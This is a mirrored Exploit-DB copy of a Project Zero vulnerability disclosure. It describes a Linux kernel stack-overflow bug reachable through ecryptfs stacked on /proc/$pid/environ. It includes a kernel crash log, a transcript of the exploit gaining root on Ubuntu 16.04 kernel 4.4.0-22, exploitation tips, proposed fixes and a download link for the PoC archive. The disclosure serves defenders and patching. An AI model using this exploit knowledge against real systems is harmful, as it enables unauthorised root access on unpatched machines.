Linux Kernel – ‘ecryptfs’ ‘/proc/$pid/environ’ Local Privilege Escalation

  • 作者: Google Security Research
    日期: 2016-06-21
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/39992/
  • Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=836
    
    Stacking filesystems, including ecryptfs, protect themselves against
    deep nesting, which would lead to kernel stack overflow, by tracking
    the recursion depth of filesystems. E.g. in ecryptfs, this is
    implemented in ecryptfs_mount() as follows:
    
    	s->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1;
    
    	rc = -EINVAL;
    	if (s->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
    		pr_err("eCryptfs: maximum fs stacking depth exceeded\n");
    		goto out_free;
    	}
    
    
    The files /proc/$pid/{mem,environ,cmdline}, when read, access the
    userspace memory of the target process, involving, if necessary,
    normal pagefault handling. If it was possible to mmap() them, an
    attacker could create a chain of e.g. /proc/$pid/environ mappings
    where process 1 has /proc/2/environ mapped into its environment area,
    process 2 has /proc/3/environ mapped into its environment area and so
    on. A read from /proc/1/environ would invoke the pagefault handler for
    process 1, which would invoke the pagefault handler for process 2 and
    so on. This would, again, lead to kernel stack overflow.
    
    
    One interesting fact about ecryptfs is that, because of the encryption
    involved, it doesn't just forward mmap to the lower file's mmap
    operation. Instead, it has its own page cache, maintained using the
    normal filemap helpers, and performs its cryptographic operations when
    dirty pages need to be written out or when pages need to be faulted
    in. Therefore, not just its read and write handlers, but also its mmap
    handler only uses the lower filesystem's read and write methods.
    This means that using ecryptfs, you can mmap [decrypted views of]
    files that normally wouldn't be mappable.
    
    Combining these things, it is possible to trigger recursion with
    arbitrary depth where:
    
    a reading userspace memory access in process A (from userland or from
    copy_from_user())
    causes a pagefault in an ecryptfs mapping in process A, which
    causes a read from /proc/{B}/environ, which
    causes a pagefault in an ecryptfs mapping in process B, which
    causes a read from /proc/{C}/environ, which
    causes a pagefault in an ecryptfs mapping in process C, and so on.
    
    On systems with the /sbin/mount.ecryptfs_private helper installed
    (e.g. Ubuntu if the "encrypt my home directory" checkbox is ticked
    during installation), this bug can be triggered by an unprivileged
    user. The mount helper considers /proc/$pid, where $pid is the PID of
    a process owned by the user, to be a valid mount source because the
    directory is "owned" by the user.
    
    I have attached both a generic crash PoC and a build-specific exploit
    that can be used to gain root privileges from a normal user account on
    Ubuntu 16.04 with kernel package linux-image-4.4.0-22-generic, version
    4.4.0-22.40, uname "Linux user-VirtualBox 4.4.0-22-generic #40-Ubuntu
    SMP Thu May 12 22:03:46 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux".
    
    dmesg output of the crasher:
    
    ```
    [ 80.036069] BUG: unable to handle kernel paging request at fffffffe4b9145c0
    [ 80.040028] IP: [<ffffffff810c9a33>] cpuacct_charge+0x23/0x40
    [ 80.040028] PGD 1e0d067 PUD 0 
    [ 80.040028] Thread overran stack, or stack corrupted
    [ 80.040028] Oops: 0000 [#1] SMP 
    [ 80.040028] Modules linked in: vboxsf drbg ansi_cprng xts gf128mul dm_crypt snd_intel8x0 snd_ac97_codec ac97_bus snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi vboxvideo snd_seq ttm snd_seq_device drm_kms_helper snd_timer joydev drm snd fb_sys_fops soundcore syscopyarea sysfillrect sysimgblt vboxguest input_leds i2c_piix4 8250_fintek mac_hid serio_raw parport_pc ppdev lp parport autofs4 hid_generic usbhid hid psmouse ahci libahci e1000 pata_acpi fjes video
    [ 80.040028] CPU: 0 PID: 2135 Comm: crasher Not tainted 4.4.0-22-generic #40-Ubuntu
    [ 80.040028] Hardware name: innotek GmbH VirtualBox/VirtualBox, BIOS VirtualBox 12/01/2006
    [ 80.040028] task: ffff880035443200 ti: ffff8800d933c000 task.ti: ffff8800d933c000
    [ 80.040028] RIP: 0010:[<ffffffff810c9a33>][<ffffffff810c9a33>] cpuacct_charge+0x23/0x40
    [ 80.040028] RSP: 0000:ffff88021fc03d70EFLAGS: 00010046
    [ 80.040028] RAX: 000000000000dc68 RBX: ffff880035443260 RCX: ffffffffd933c068
    [ 80.040028] RDX: ffffffff81e50560 RSI: 000000000013877a RDI: ffff880035443200
    [ 80.040028] RBP: ffff88021fc03d70 R08: 0000000000000000 R09: 0000000000010000
    [ 80.040028] R10: 0000000000002d4e R11: 00000000000010ae R12: ffff8802137aa200
    [ 80.040028] R13: 000000000013877a R14: ffff880035443200 R15: ffff88021fc0ee68
    [ 80.040028] FS:00007fbd9fadd700(0000) GS:ffff88021fc00000(0000) knlGS:0000000000000000
    [ 80.040028] CS:0010 DS: 0000 ES: 0000 CR0: 0000000080050033
    [ 80.040028] CR2: fffffffe4b9145c0 CR3: 0000000035415000 CR4: 00000000000006f0
    [ 80.040028] Stack:
    [ 80.040028]ffff88021fc03db0 ffffffff810b4b83 0000000000016d00 ffff88021fc16d00
    [ 80.040028]ffff880035443260 ffff8802137aa200 0000000000000000 ffff88021fc0ee68
    [ 80.040028]ffff88021fc03e30 ffffffff810bb414 ffff88021fc03dd0 ffff880035443200
    [ 80.040028] Call Trace:
    [ 80.040028]<IRQ> 
    [ 80.040028][<ffffffff810b4b83>] update_curr+0xe3/0x160
    [ 80.040028][<ffffffff810bb414>] task_tick_fair+0x44/0x8e0
    [ 80.040028][<ffffffff810b1267>] ? sched_clock_local+0x17/0x80
    [ 80.040028][<ffffffff810b146f>] ? sched_clock_cpu+0x7f/0xa0
    [ 80.040028][<ffffffff810ad35c>] scheduler_tick+0x5c/0xd0
    [ 80.040028][<ffffffff810fe560>] ? tick_sched_handle.isra.14+0x60/0x60
    [ 80.040028][<ffffffff810ee961>] update_process_times+0x51/0x60
    [ 80.040028][<ffffffff810fe525>] tick_sched_handle.isra.14+0x25/0x60
    [ 80.040028][<ffffffff810fe59d>] tick_sched_timer+0x3d/0x70
    [ 80.040028][<ffffffff810ef282>] __hrtimer_run_queues+0x102/0x290
    [ 80.040028][<ffffffff810efa48>] hrtimer_interrupt+0xa8/0x1a0
    [ 80.040028][<ffffffff81052fa8>] local_apic_timer_interrupt+0x38/0x60
    [ 80.040028][<ffffffff81827d9d>] smp_apic_timer_interrupt+0x3d/0x50
    [ 80.040028][<ffffffff81826062>] apic_timer_interrupt+0x82/0x90
    [ 80.040028]<EOI> 
    [ 80.040028] Code: 0f 1f 84 00 00 00 00 00 66 66 66 66 90 48 8b 47 08 48 8b 97 78 07 00 00 55 48 63 48 10 48 8b 52 60 48 89 e5 48 8b 82 b8 00 00 00 <48> 03 04 cd 80 42 f3 81 48 01 30 48 8b 52 48 48 85 d2 75 e5 5d 
    [ 80.040028] RIP[<ffffffff810c9a33>] cpuacct_charge+0x23/0x40
    [ 80.040028]RSP <ffff88021fc03d70>
    [ 80.040028] CR2: fffffffe4b9145c0
    [ 80.040028] fbcon_switch: detected unhandled fb_set_par error, error code -16
    [ 80.040028] fbcon_switch: detected unhandled fb_set_par error, error code -16
    [ 80.040028] ---[ end trace 616e3de50958c35b ]---
    [ 80.040028] Kernel panic - not syncing: Fatal exception in interrupt
    [ 80.040028] Shutting down cpus with NMI
    [ 80.040028] Kernel Offset: disabled
    [ 80.040028] ---[ end Kernel panic - not syncing: Fatal exception in interrupt
    ```
    
    example run of the exploit, in a VM with 4 cores, with Ubuntu 16.04 installed:
    
    ```
    user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ls
    compile.shexploit.chello.csuidhelper.c
    user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ./compile.sh 
    user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ls
    compile.shexploitexploit.chellohello.csuidhelpersuidhelper.c
    user@user-VirtualBox:/media/sf_vm_shared/crypt_endless_recursion/exploit$ ./exploit
    all spammers ready
    recurser parent ready
    spam over
    fault chain set up, faulting now
    writing stackframes
    stackframes written
    killing 2494
    post-corruption code is alive!
    children should be dead
    coredump handler set. recurser exiting.
    going to crash now
    suid file detected, launching rootshell...
    we have root privs now...
    root@user-VirtualBox:/proc# id
    uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)
    ```
    
    (If the exploit crashes even with the right kernel version, try
    restarting the machine. Also, ensure that no program like top/htop/...
    is running that might try to read process command lines. Note that
    the PoC and the exploit don't really clean up after themselves and
    leave mountpoints behind that prevent them from re-running without
    a reboot or manual unmounting.)
    
    Note that Ubuntu compiled their kernel with
    CONFIG_SCHED_STACK_END_CHECK turned on, making it harder than it used
    to be in the past to not crash the kernel while exploiting this bug,
    and an overwrite of addr_limit would be useless because at the
    time the thread_info is overwritten, there are multiple instances of
    kernel_read() on the stack. Still, the bug is exploitable by carefully
    aligning the stack so that the vital components of thread_info are
    preserved, stopping with an out-of-bounds stack pointer and
    overwriting the thread stack using a normal write to an adjacent
    allocation of the buddy allocator.
    
    Regarding the fix, I think the following would be reasonable:
    
     - Explicitly forbid stacking anything on top of procfs by setting its
     s_stack_depth to a sufficiently large value. In my opinion, there
     is too much magic going on inside procfs to allow stacking things
     on top of it, and there isn't any good reason to do it. (For
     example, ecryptfs invokes open handlers from a kernel thread
     instead of normal user process context, so the access checks inside
     VFS open handlers are probably ineffective - and procfs relies
     heavily on those.)
    
     - Forbid opening files with f_op->mmap==NULL through ecryptfs. If the
     lower filesystem doesn't expect to be called in pagefault-handling
     context, it probably shouldn't be called in that context.
    
     - Create a dedicated kernel stack cache outside of the direct mapping
     of physical memory that has a guard page (or a multi-page gap) at
     the bottom of each stack, and move the struct thread_info to a
     different place (if nothing else works, the top of the stack, above
     the pt_regs).
     While e.g. race conditions are more common than stack overflows in
     the Linux kernel, the whole vulnerability class of stack overflows
     is easy to mitigate, and the kernel is sufficiently complicated for
     unbounded recursion to emerge in unexpected places - or perhaps
     even for someone to discover a way to create a stack with a bounded
     length that is still too high. Therefore, I believe that guard
     pages are a useful mitigation.
     Nearly everywhere, stack overflows are caught using guard pages
     nowadays; this includes Linux userland, but also {### TODO ###}
     and, on 64-bit systems, grsecurity (using GRKERNSEC_KSTACKOVERFLOW).
    
    Oh, and by the way: The `BUG_ON(task_stack_end_corrupted(prev))`
    in schedule_debug() ought to be a direct panic instead of an oops. At
    the moment, when you hit it, you get a recursion between the scheduler
    invocation in do_exit() and the BUG_ON in the scheduler, and the
    kernel recurses down the stack until it hits something sufficiently
    important to cause a panic.
    
    I'm going to send (compile-tested) patches for my first two fix
    suggestions and the recursive oops bug. I haven't written a patch for
    the guard pages mitigation - I'm not familiar enough with the x86
    subsystem for that.
    
    
    Notes regarding the exploit:
    
    It makes an invalid assumption that causes it to require at least around 6GB of RAM.
    
    It has a trivially avoidable race that causes it to fail on single-core systems after overwriting the coredump handler; if this happens, it's still possible to manually trigger a coredump and execute the suid helper to get a root shell.
    
    The page spraying is pretty primitive and racy; while it works reliably for me, there might be influencing factors that cause it to fail on other people's machines.
    
    
    Proof of Concept:
    https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39992.zip